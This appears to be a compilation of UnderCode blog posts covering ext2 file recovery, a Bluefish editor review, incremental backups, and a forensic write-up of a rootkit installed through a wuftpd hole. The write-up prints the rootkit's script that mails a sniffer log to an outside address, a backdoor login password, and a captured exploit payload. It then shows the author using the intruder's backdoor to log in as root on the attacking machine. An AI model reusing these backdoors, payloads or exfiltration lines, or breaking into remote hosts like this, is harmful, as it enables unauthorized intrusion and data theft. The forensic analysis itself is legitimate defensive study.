WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Miscellaneous Tools: Recovering Deleted Files on the ext2 File System:
twitter.com/UnderCodeNews
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) If you accidentally deleted an important file, say with rm -rf kkk where kkk mattered to you, don't panic. Stop writing anything to that disk immediately: the data is still fully recoverable as long as its blocks have not been reused. (The following is written specifically for the ext2 file system; other file systems have their own methods, which I will write up later.)
# debugfs /dev/hda1      (the partition holding the deleted file)
debugfs: lsdel
This lists the inodes of recently deleted files in roughly this form:
2) Inode Owner Mode Size Blocks Time deleted
3) The columns are the inode number, owner, mode (the permission bits), size, blocks (usually 1 block = 1K), and deletion time. With this information you should be able to pick out the file you want quickly. Then run
debugfs: dump <inode> /home/recovered-file
with the inode number in angle brackets and, as the second argument, the output file to write (put it on a different partition so you don't overwrite blocks you are still trying to recover). That's it: the recovered contents are now in /home/recovered-file.
4) Of course, if you have many files, doing this one by one is tedious; there are tools for that, for example:
http://revocer.sourceforge.net/linux/recover.
Try it, and post here if you run into difficulties.
5) While practising this, a reader got the following output and did not know how to proceed. Please advise.
311543 0 100600 7603556 14/14 Wed Oct 2 18:39:21 2002
586046 0 100644 7044 2/2 Wed Oct 2 18:51:50 2002
760593 0 100600 363 1/1 Wed Oct 2 18:53:35 2002
9551 deleted inodes found.
debugfs: dump 311543
dump: Usage: dump_inode [-p] <file> <output_file>
debugfs: dump 311543 /root
311543: File not found by ext2_lookup
debugfs:
6) I want to recover inode 311543: I deleted a file in the /root directory and saw it listed as 311543, but restoring it with the command above produced the error shown.
7) It should be done like this:
debugfs: dump <311543> /root/ppp      (ppp can be any file name)
Try again. Did it work?
8) I am under Windows right now, and my Linux uses JFS, where recovery is more convenient. I will switch to Linux and set up an ext2 system to try it; I have tried it before and it should work.
9) OK. Great, that did the trick.
Now a further question: I deleted a .tar.gz file, but after recovering it I cannot extract it with
# tar zxvf *.tar.gz
10) The other question is how to recover the original file name. For example, I deleted wine.tar.gz but can't remember its exact name and want it back under that name. Or suppose I deleted an important system file, such as mozilla under /usr/bin, and don't remember what it was called, although the name matters to the system. How can I do that?
11) First understand why. To find the file name, use
debugfs: ls -d /root      (here /root is the directory that held the file; -d lists its deleted entries, which still carry the old names)
12) As for the recovered file being unusable: dump assumes a contiguous run of blocks, and your file may not be contiguous. Use debugfs: stat <inode> to see its state, and then dd the blocks out one by one (there are tools that save a lot of effort, of course).
WRITTEN BY UNDERCODE
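As an added example (not from the thread above and not debugfs's own code) of doing this for many files at once: the script below parses lsdel output, filters candidates, and writes a command file that debugfs can replay with debugfs -f recover.cmds /dev/hda1. The sample lsdel listing is constructed to mirror the one in the thread; the device name /dev/hda1 and the output directory /mnt/recover are assumptions.

```python
"""Batch recovery helper for `debugfs lsdel` output (added example; not part of
the thread above and not debugfs's own code).  It parses the listing, filters
candidates, and writes a command file that `debugfs -f <file> /dev/hda1`
replays, one `dump <inode> outfile` per candidate.  /dev/hda1 and /mnt/recover
are assumptions for illustration."""

import re
from datetime import datetime

# Constructed lsdel listing modelled on the one in the thread; not real data.
SAMPLE_LSDEL = """\
 Inode  Owner  Mode    Size      Blocks   Time deleted
311543      0 100600  7603556   14/14 Wed Oct  2 18:39:21 2002
586046      0 100644     7044     2/2 Wed Oct  2 18:51:50 2002
760593      0 100600      363     1/1 Wed Oct  2 18:53:35 2002
3 deleted inodes found.
"""

LSDEL_RE = re.compile(
    r"^\s*(?P<inode>\d+)\s+(?P<owner>\d+)\s+(?P<mode>[0-7]+)\s+(?P<size>\d+)"
    r"\s+(?P<blocks>\d+)/(?P<total>\d+)\s+(?P<when>\w{3} \w{3}\s+\d+ [\d:]+ \d{4})\s*$"
)


def parse_lsdel(text):
    """One dict per deleted inode; the header and the summary line are skipped."""
    entries = []
    for line in text.splitlines():
        m = LSDEL_RE.match(line)
        if not m:
            continue
        entries.append({
            "inode": int(m["inode"]),
            "owner": int(m["owner"]),
            "mode": int(m["mode"], 8),            # 100600 -> regular file, rw-------
            "size": int(m["size"]),
            "blocks": int(m["blocks"]),           # blocks still free
            "total": int(m["total"]),             # blocks the inode had
            "deleted": datetime.strptime(m["when"], "%a %b %d %H:%M:%S %Y"),
        })
    return entries


def select(entries, min_size=0, owner=None, since=None):
    """Keep inodes whose block list is still complete (blocks == total) and
    that pass the optional size / owner / deletion-time filters."""
    chosen = []
    for e in entries:
        if e["blocks"] != e["total"] or e["size"] < min_size:
            continue
        if owner is not None and e["owner"] != owner:
            continue
        if since is not None and e["deleted"] < since:
            continue
        chosen.append(e)
    return chosen


def dump_commands(entries, outdir):
    """The inode number must be in angle brackets; without them debugfs treats
    it as a path name and fails with 'File not found by ext2_lookup', exactly
    the error seen in the thread.  outdir should be on another partition so
    the recovered data cannot overwrite blocks still waiting to be recovered."""
    return [f"dump <{e['inode']}> {outdir}/inode-{e['inode']}" for e in entries]


def write_command_file(entries, outdir, path):
    """Write the command file for `debugfs -f path /dev/hda1`; returns the count."""
    cmds = dump_commands(entries, outdir)
    with open(path, "w") as fh:
        fh.write("\n".join(cmds) + "\n")
    return len(cmds)


if __name__ == "__main__":
    found = select(parse_lsdel(SAMPLE_LSDEL), min_size=1000)
    print("\n".join(dump_commands(found, "/mnt/recover")))
```

Feed it real output with debugfs -R lsdel /dev/hda1 > lsdel.txt, then write_command_file(select(parse_lsdel(open("lsdel.txt").read()), min_size=1000), "/mnt/recover", "recover.cmds") and replay with debugfs -f recover.cmds /dev/hda1. The blocks/total filter matters: an entry such as 1/2 means one of the file's blocks has already been reused, so dumping it gives you garbage for that part.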
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Bluefish, a text-based web editor for Linux:
fb.com/UnderCodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Bluefish advertises itself as "an editor for skilled web designers and programmers", but its UI is very intuitive: any beginner can get started quickly and gradually master its other features. If you need a text editor for writing web code, it is a very good choice. The overall impression it gives me is professional but not intimidating, and the mix of text and icons works well.
2) Bluefish provides options for many common HTML tasks, such as fonts, tables and of course links. The software uses the less common term "anchor" for clickable links. The link dialog even offers JavaScript event handlers such as OnClick and OnMouseover.
3) There are other dialogs for PHP and SQL tasks, plus many Apache and C options, and you can group files into projects for development. Search and replace is also very good, with regular-expression support, and syntax highlighting can be customised for multiple languages.
4) Now some shortcomings. If you need documentation you have to open a separate document, because help is not integrated into the application. The manual is very extensive, and with patience you can certainly find what you want. For example, I could not find spell checking quickly; after reading the manual I found that you must install the standalone open-source Aspell to get spell checking.
5) Macros are handled through a "custom menu", where you can create your own text strings, HTML opening and closing tags, or search-and-replace commands. Creating text strings includes some dialog boxes with extra features, and they are very simple to use.
6) Somewhat disappointingly, in such an intuitive interface I did not find an "Edit" entry for the custom-menu macro I had created, but if you follow the steps in the manual everything becomes clear. Compared with some other applications the macro facility is not very powerful; for example, I could not find a way to call other Bluefish commands from the custom menu, but macros are very handy for repeated input.
7) Finally, Bluefish does not position itself as a writing application, and it lacks some text-manipulation commands, such as changing case or joining and splitting lines.
8) That said, if you are looking for a moderately featured, text-based web code editor, Bluefish is definitely worth a try.
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Making incremental backups on Linux:
T.me/underCodeTesting
1) The first step in making an incremental backup is to generate a list of files that changed in a given period. This is usually done with the find command.
2) For example, to list the files that changed in the last 24 hours:
find / -mtime -1 ! -type d -print > /tmp/filelist.daily
3) Here -mtime -1 makes find select files modified within the past 24 hours, and ! -type d drops directories from the list. Similarly, to find all files changed in the past week:
find / -mtime -7 ! -type d -print > /tmp/filelist.weekly
4) Once you have the list of files to back up, use tar's -T option to read the names to archive from that file. For example, to back up all the files listed in /tmp/filelist.daily to the device /dev/fd0:
tar -cv -T /tmp/filelist.daily -f /dev/fd0
Keep the ! -type d filter (or pass --no-recursion to tar): a directory name in the list makes tar archive its whole contents, changed or not. If file names may contain spaces or newlines, write the list with find ... -print0 and read it with tar --null -T instead.
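An added example (my own code, not the page's) that does the same job in Python with a snapshot file instead of a fixed 24-hour window: a stamp file records when the last backup started, and the next run picks up everything newer than it, so a run that is late or skipped never leaves a gap between increments. The directory tree built in demo() is constructed for illustration; the stamp-file name is an assumption.

```python
"""Incremental backup driven by a stamp file rather than `find -mtime -1`
(added example, not the page's code).  Whatever is newer than the stamp goes
into the archive, then the stamp is advanced to the start time of this run."""

import os
import stat
import tarfile
import tempfile
import time


def changed_files(root, since):
    """Regular files under root modified after `since` (epoch seconds): the
    equivalent of `find root -newer STAMP ! -type d`.  Symlinks and special
    files are skipped; directories never appear, so tar cannot recurse."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except FileNotFoundError:
                continue  # deleted while we were walking
            if stat.S_ISREG(st.st_mode) and st.st_mtime > since:
                hits.append(path)
    hits.sort()
    return hits


def build_incremental(root, stamp_file, archive):
    """Archive files changed since the last run and advance the stamp.
    Returns the archived paths relative to root."""
    since = os.path.getmtime(stamp_file) if os.path.exists(stamp_file) else 0.0
    start = time.time()  # taken before the walk: a file modified mid-walk is caught next run
    files = changed_files(root, since)
    with tarfile.open(archive, "w:gz") as tar:
        for path in files:
            # recursive=False is the tar --no-recursion safeguard
            tar.add(path, arcname=os.path.relpath(path, root), recursive=False)
    with open(stamp_file, "a"):
        pass
    os.utime(stamp_file, (start, start))
    return [os.path.relpath(p, root) for p in files]


def archive_members(archive):
    with tarfile.open(archive, "r:gz") as tar:
        return sorted(tar.getnames())


def demo():
    """Constructed tree: a full run, an empty run, then one touched file."""
    work = tempfile.mkdtemp(prefix="incr-")
    root = os.path.join(work, "data")
    os.makedirs(os.path.join(root, "etc"))
    for rel, age in (("etc/passwd", 3600), ("notes.txt", 60)):
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        old = time.time() - age
        os.utime(path, (old, old))
    stamp = os.path.join(work, "last-backup")
    first = build_incremental(root, stamp, os.path.join(work, "full.tgz"))
    second = build_incremental(root, stamp, os.path.join(work, "inc1.tgz"))
    touched = os.path.join(root, "notes.txt")
    with open(touched, "a") as fh:
        fh.write("changed\n")
    future = time.time() + 5  # make sure the mtime is past the stamp
    os.utime(touched, (future, future))
    third = build_incremental(root, stamp, os.path.join(work, "inc2.tgz"))
    return {
        "first": first,
        "second": second,
        "third": third,
        "full_members": archive_members(os.path.join(work, "full.tgz")),
        "inc2_members": archive_members(os.path.join(work, "inc2.tgz")),
    }


if __name__ == "__main__":
    print(demo())
```

The same scheme in plain shell is touch -r on a stamp file plus find / -newer /var/backups/stamp ! -type d -print0 | tar --null -cvf /dev/fd0 -T -, run after the stamp has been copied aside; the Python version just keeps the bookkeeping in one place.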
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ
๐ฆ Tracking a hack: full tutorial by undercode:
t.me/undercodeTesting
๐ฆ ๐๐ผ๐๐ ๐๐๐ธโ๐ :
1) Checking my machine, I unexpectedly discovered it had been hacked. It was actually my own fault: I had not patched wuftpd 2.6 and had not edited /etc/ftpusers either, so anyone could use the wuftpd 2.6 remote vulnerability to get into my machine through the anonymous user. This visitor, however, had clearly installed his rootkit carelessly.
๐ฆ As a result, the output of ps looked like this:
[root@ns]# ps
  PID TTY STAT TIME COMMAND
  678   1 S    0:00 /sbin/mingetty tty1
  679   2 S    0:00 /sbin/mingetty tty2
  680   3 S    0:00 /sbin/mingetty tty3
  681   4 S    0:00 /sbin/mingetty tty4
  682   5 S    0:00 /sbin/mingetty tty5
  683   6 S    0:00 /sbin/mingetty tty6
 5557   ? S    0:00 /bin/sh -i
 5591   ? R    0:00 ps
๐ฆ Anyone can see what that means: an interactive shell running as root with no controlling terminal. So let's go step by step and see what he did.
[This intruder did not expect that the machine already had an owner, and installed his own rootkit toolkit.]
1) [root@ns]# strings /bin/login | more
..........
__bss_start
_end
PPRV
DISPLAY
/bin/envpc
l4m3r0x
/bin/sh
2) From this it can be seen that login has been replaced by a backdoor: after export PATH="l4m3r0x" you can telnet straight in and get a root # prompt.
[root@ns]# strings /bin/ls | more
.....
always
/usr/local/share/locale
fileutils
GNU fileutils-3.13
vdir
%s-%s
/dev/sgk/.fsdc/.1file
//DIRED//
//SUBDIRED//
POSIXLY_CORRECT
COLUMNS
3) Note the string /dev/sgk/.fsdc/.1file: a genuine ls has no business knowing a path under /dev, so that is where his rootkit lives. Let's move that hide list out of the way first (otherwise the trojaned ls would hide the files it names) and see what's there:
[root@ns]# mv /dev/sgk/.fsdc/.1file /tmp
[root@ns]# ls -la /dev/sgk/.fsdc
total 641
drwxr-xr-x 5 root ftp 1024 Feb 4 09:01 .
drwxr-xr-x 3 root ftp 1024 Feb 2 17:11 ..
-rw-r--r-- 1 root ftp 7 Feb 2 17:11 .1logz
-rw-r--r-- 1 root ftp 88 Feb 2 17:11 .1proc
drwxr-xr-x 2 root ftp 1024 Feb 2 17:11 backup
drwxrwxr-x 2 undercode 1024 Feb 2 17:14 clean
-rwxr-xr-x 1 undercode 5578 Nov 18 11:08 filetrans
-rwxr-xr-x 1 undercode 9396 Aug 23 killall-real
-rwxr-xr-x 1 undercode 7578 Aug 21 17:22 parse
-rwxr-xr-x 1 undercode 6232 Sep 9 parse1
drwxrwxr-x 2 undercode 1024 Jan 28 16:34 patches
-rwxr-xr-x 1 undercode 28004 Aug 23 ps-real
-rwxr-xr-x 1 undercode 580696 Feb 18 2000 ssh
-rw-r--r-- 1 root ftp 1398 Feb 4 08:55 system
4) Quite a lot of stuff. The files owned by root:ftp show that he came in through the ftp vulnerability, and the ones owned by a local user show that he also stole a local account (lujiang).
[root@ns .fsdc]# cat .1logz
rshd
[root@ns .fsdc]# cat .1proc
3 nscd
2 nmap
2 lscan
2 login
2 lpset
2 xtty
2 nscd
3 statd
3 lpq
3 scan
3 sniff
3 envpc
[root@ns .fsdc]# cat /tmp/.1file
sgk
.fsdc
.clib
.1proc
.1addr
.1file
.1logz
envpc
xtty
pttys
filetrans
lpset
libload
system
parse
5) .1logz is read by the trojaned syslogd and hides the log records generated by the listed programs. .1proc is read by the trojaned ps and hides the listed process names. .1file is read by the trojaned ls and hides the listed file names.
[root@ns .fsdc]# cd patches
[root@ns patches]# cat patch.sh
#!/bin/sh
echo "[1] Patching WU-FTPd ..."
rpm -Uhv wuftpd.rpm
echo "[2] Patching NFS-utils ..."
rpm -Fvh nfs-utils.rpm
ps aux >> /tmp/psaux
if [ "`cat /tmp/psaux | grep rpc.statd`" ]; then
echo "[3] Restarting the rpc.statd daemon (NFS-utils)"
/etc/rc.d/init.d/nfslock restart
else
echo "[4] The daemon rpc.statd isn't running, so no need to restart!"
fi
rm /tmp/psaux
6) This is a patch script for the wuftpd and rpc.statd vulnerabilities: the intruder closes the holes behind him so that nobody else gets in the same way. I did not read the other directories carefully [I will provide them as a download package]. Using the hide list in .1file we can now find the remaining files one by one.
[root@ns .fsdc]# strings /usr/bin/xtty
. .....
PPRV
(nfsiod)
socket
bind
listen
accept
/bin/sh
7) It is not hard to see that this is a backdoor: it creates a socket, binds and listens on it, accepts a connection and hands it /bin/sh, and the (nfsiod) string suggests it disguises itself as an NFS daemon in the process list.
[root@ns .fsdc]# strings /dev/pttys
#!/bin/sh
cat /dev/sgk/.fsdc/system | mail prosupp@usa.net > /dev/null 2>&1
nohup /usr/lib/lpset > /dev/null &
nohup /usr/bin/xtty > /dev/null &
rm -rf nohup.out
This hacker is quite clever: the script mails the sniffer log to prosupp@usa.net [/dev/sgk/.fsdc/system is the sniffer log].
[root@ns .fsdc]# cat /etc/rc.d/rc.sysinit|more
..........
if [ \"$PROMPT\" != \"no\" ]; then
/sbin/getkey i && touch /var/run/confirm
fi
wait
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Name Server Cache Daemon..
/usr/sbin/nscd -q
# Kernel module checker
/usr/lib/libload > /dev/null 2>&1
[root@ns bak]# strings /usr/sbin/nscd|more
+Q$9
/usr/info/.clib/sshd_config
Received SIGHUP; restarting.
RESTART FAILED: av[0]='%.100s', error: %.100s.
Received signal %d; terminating.
Timeout before authentication.
Generating new %d bit RSA key.
RSA key generation complete.
f:p:b:k:h:g:diqV:
i686-unknown-linux
1.2.27
sshd version %s [%s]
Usage: %s [options]
Options:
/usr/info/.clib stores an ssh backdoor, so that the machine opens a convenient door for the intruder after every startup.
[root@ns .fsdc]# strings /sbin/syslogd
==================================================================
Time: %s Size: %d
Path: %s
=> %s [%d]
------------------------------------------------------------
Exiting ...
cant get SOCK_PACKET socket
cant get flags
cant set promiscuous mode
/dev/null
eth0
system
cant open log
This intruder replaced the syslogd binary with a sniffer.
. . . . . . . . . .
The next step is to restore the system and change the stolen account passwords; I won't go into that here. From my sniffer records I know that he came from these two machines.
[root@ns man]# more system2
==================================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
## g #> 4h #> 4hUSER ftp
#> hPASS 111F11CA? k ^ 11 ^ Ff \ 1 ^ = 11 ^ C11 ^ u1F ^ = 0F1FvFNV110bin0sh1..11
#> h <#? Hsite exec xx (%. F% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f%
.f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f % .f% .f% .f% .f% .f% .f% .f% .f
% .f% .f% .f% .f% .f% .f% .f% .f% .f%. f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f
% .f % .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% .f% c% c% c% .f |% p
# @@ h
========================================
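The record above is one entry from the sniffer log written by the replaced syslogd (its strings show the `Time: %s Size: %d` / `Path: %s => %s [%d]` layout). The parser below is an added example, not part of the original post; it splits such a log into records, counts which source host hit which service, and pulls the FTP usernames out of the captured sessions, which is what you need for the "reset the stolen accounts" step. The sample log is constructed in the same layout: the first source address is the one from the post, the second host, the user name and the record sizes are made up, and the exploit payload is not reproduced.

```python
# Added example, not part of the original post: parse records in the format
# the sniffer (the replaced syslogd) writes and summarise them for the
# incident responder.
import re
from collections import Counter

TIME_RE = re.compile(r"^Time:\s*(?P<time>.+?)\s+Size:\s*(?P<size>\d+)\s*$")
PATH_RE = re.compile(
    r"^Path:\s*(?P<src>\S+)\s*=>\s*(?P<dst>\S+)\s*\[(?P<port>\d+)\]\s*$")


def parse_sniffer_log(text):
    """Split the log on '====' separator lines and return one dict per record."""
    records = []
    current = None
    in_data = False
    for line in text.splitlines():
        if line.startswith("===="):
            if current is not None and "src" in current:
                records.append(current)
            current, in_data = {"data": []}, False
            continue
        if current is None:
            continue  # noise before the first separator
        if in_data:
            current["data"].append(line)
        elif line.startswith("----"):
            in_data = True  # header done, captured payload follows
        else:
            m = TIME_RE.match(line)
            if m:
                current["time"] = m.group("time")
                current["size"] = int(m.group("size"))
                continue
            m = PATH_RE.match(line)
            if m:
                current["src"] = m.group("src")
                current["dst"] = m.group("dst")
                current["port"] = int(m.group("port"))
    if current is not None and "src" in current:
        records.append(current)
    for r in records:
        r["data"] = "\n".join(r["data"])
    return records


def sources_by_service(records):
    """Count (source host, destination port) pairs: who talked to which service."""
    return Counter((r["src"], r["port"]) for r in records)


def ftp_users(records):
    """Usernames from USER commands in captured FTP sessions (port 21).

    The captured data is raw TCP payload with binary junk around the
    commands, so search inside each line instead of matching from its start."""
    users = set()
    for r in records:
        if r["port"] != 21:
            continue
        for line in r["data"].splitlines():
            m = re.search(r"USER\s+(\S+)", line)
            if m:
                users.add(m.group(1))
    return users


def load_sniffer_log(path):
    """Read a real log file; it contains raw bytes, so decode leniently."""
    with open(path, "rb") as fh:
        return fh.read().decode("latin-1")


# Constructed sample (not the real 'system' file from the compromised host).
SAMPLE_LOG = """\
=================================================================
Time: Fri Feb 2 17:26:07 Size: 1056
Path: 210.217.237.75 => ns.xxx.cn [21]
------------------------------------------------------------
##g#>4h#>4hUSER ftp
#>hPASS [payload omitted]
=================================================================
Time: Fri Feb 2 18:02:41 Size: 212
Path: 192.0.2.10 => ns.xxx.cn [21]
------------------------------------------------------------
USER alice
PASS [redacted]
=================================================================
"""

if __name__ == "__main__":
    recs = parse_sniffer_log(SAMPLE_LOG)
    print("sources by service:", dict(sources_by_service(recs)))
    print("ftp users captured:", sorted(ftp_users(recs)))
```

Run it on the real file with `parse_sniffer_log(load_sniffer_log("/dev/sgk/.fsdc/system"))`; every user that shows up in `ftp_users` (and the corresponding telnet/POP sessions, if you extend the search to those ports) had their password captured and needs it reset.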
From the above we know that the attack came from 210.217.237.75. By habit, such intruders usually plant the same backdoor on every machine they use, so:
[root@ns man]# export DISPLAY="l4m3r0x"
[root@ns man]# telnet 210.217.237.75
Trying 210.217.237.75 ...
Connected to 210.217.237.75.
Escape character is '^]'.
> Boramae Cache Server 3.5.1
bash# w
> 7:48pm up 71 days, 9:43, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty1 - 25Nov 0 31days 0.08s 0.05s -bash
undercode testing root
bash# ps -ef
PID TTY STAT TIME COMMAND
940 2 S 0:00 /sbin/mingetty tty2 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
941 3 S 0:00 /sbin/mingetty tty3 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
942 4 S 0:00 /sbin/mingetty tty4 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
943 5 S 0:00 /sbin/mingetty tty5 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
944 6 S 0:00 /sbin/mingetty tty6 HOME=/ TERM=linux BOOT_IMAGE=linux AUTO
957 1 S 0:00 -bash HOME=/root PATH=/sbin:/bin:/usr/sbin:/usr/bin SHELL=/
22151 ? S 0:00 -bash HOME=/root USER=root LOGNAME=root PATH=/usr/bin:/bin:
22178 ? S 0:00 \_ ../ssh -l pthl mega.ee.tu-berlin.de LESSOPEN=|/usr/bin/
. . . . . . . . . .
3) Use the rpm command to check whether commonly used commands have been modified.
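On an RPM-based system the check is `rpm -Va`, which compares every packaged file against the size, digest, mode and owner recorded at install time. The script below is an added example, not part of the original post: it parses that output and singles out non-config files under the system binary directories whose size or digest changed (as the trojaned ps, syslogd and nscd here would), and separately lists config files with a changed digest (such as rc.sysinit after the extra startup lines were appended). The sample `rpm -Va` output is constructed.

```python
# Added example, not part of the original post: parse `rpm -Va` output to
# find packaged files whose contents no longer match the RPM database.
import re
import subprocess

# rpm -Va attribute columns: S size, M mode, 5 digest, D device, L symlink,
# U user, G group, T mtime, P capabilities (9th column on newer rpm only).
# '.' means the test passed, '?' means it could not be performed.
ATTR_FLAGS = {"S": "size", "M": "mode", "5": "digest", "D": "device",
              "L": "symlink", "U": "user", "G": "group", "T": "mtime",
              "P": "capabilities"}
VERIFY_RE = re.compile(
    r"^(?P<attrs>[SM5DLUGTP.?]{8,9})\s+(?:(?P<type>[cdglr])\s+)?(?P<path>/.*)$")
MISSING_RE = re.compile(r"^missing\s+(?:(?P<type>[cdglr])\s+)?(?P<path>/.*)$")


def parse_rpm_verify(output):
    """One dict per line: path, set of changed attributes, config flag, missing."""
    findings = []
    for line in output.splitlines():
        m = MISSING_RE.match(line)
        if m:
            findings.append({"path": m.group("path"), "missing": True,
                             "changed": set(), "config": m.group("type") == "c"})
            continue
        m = VERIFY_RE.match(line)
        if not m:
            continue  # warnings and unrelated output
        changed = {ATTR_FLAGS[c] for c in m.group("attrs") if c in ATTR_FLAGS}
        findings.append({"path": m.group("path"), "missing": False,
                         "changed": changed, "config": m.group("type") == "c"})
    return findings


SYSTEM_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/lib/", "/usr/lib/")


def rootkit_candidates(findings, dirs=SYSTEM_DIRS):
    """Non-config files under system binary paths whose size or digest
    changed, or that are missing. A changed mtime alone is ignored."""
    return [f["path"] for f in findings
            if not f["config"] and f["path"].startswith(dirs)
            and (f["missing"] or {"size", "digest"} & f["changed"])]


def changed_config_files(findings):
    """Config files whose digest changed, e.g. a startup script with appended lines."""
    return [f["path"] for f in findings if f["config"] and "digest" in f["changed"]]


def run_rpm_verify():
    """Live check. rpm -Va exits non-zero whenever anything differs, so no check=True."""
    out = subprocess.run(["rpm", "-Va"], capture_output=True, text=True)
    return parse_rpm_verify(out.stdout)


# Constructed sample output (not taken from the compromised host).
SAMPLE_RPM_VA = """\
S.5....T.    /bin/ps
S.5....T.    /sbin/syslogd
S.5....T.    /bin/login
.M.......    /usr/bin/passwd
S.5....T.  c /etc/rc.d/rc.sysinit
missing      /usr/share/doc/foo/README
"""

if __name__ == "__main__":
    findings = parse_rpm_verify(SAMPLE_RPM_VA)
    print("modified binaries:", rootkit_candidates(findings))
    print("modified config files:", changed_config_files(findings))
```

Two limits to keep in mind: the RPM database on a compromised host can itself be edited, so verify against the original packages (`rpm -Vp package.rpm`) or after booting from rescue media, and files the intruder added (xtty, lpset, the .clib sshd) belong to no package and never appear in `rpm -Va`, which is why the .1file list still has to be walked by hand.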
WRITTEN BY UNDERCODE
โ โ โ ๏ฝ๐๐ปโบ๐ซฤ๐ฌ๐โ โ โ โ